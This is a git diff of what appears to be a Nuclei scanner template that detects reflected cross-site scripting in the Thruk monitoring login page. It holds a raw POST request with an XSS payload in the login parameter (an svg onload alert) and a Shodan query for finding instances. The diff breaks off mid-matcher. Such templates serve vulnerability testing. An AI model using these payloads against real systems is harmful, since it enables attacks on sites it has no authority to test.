diff --git a/vulnerabilities/other/thruk-xss.yaml b/vulnerabilities/other/thruk-xss.yaml
index 5a5051619b..c1d890aeae 100644
--- a/vulnerabilities/other/thruk-xss.yaml
+++ b/vulnerabilities/other/thruk-xss.yaml
@@ -1,12 +1,17 @@
id: thruk-xss
info:
- name: Thruk Monitoring Webinterface - XSS
- author: pikpikcu
+ name: Thruk Monitoring Webinterface - Cross Site Scripting
+ author: pikpikcu,ritikchaddha
severity: medium
+ description: |
+ Thruk login page is vulnerable to Reflected XSS via the login parameter at /thruk/cgi-bin/login.cgi.
reference:
- https://www.thruk.org/download.html
- tags: xss,thruk
+ metadata:
+ verified: true
+ shodan-query: http.html:"Thruk"
+ tags: thruk,xss
requests:
- raw:
@@ -14,22 +19,20 @@ requests:
POST /thruk/cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk
- referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface
+ referer=&login=%22%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%40gmail.com&password=test&submit=Login
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- type: word
- part: body
words:
- - ""
+ - "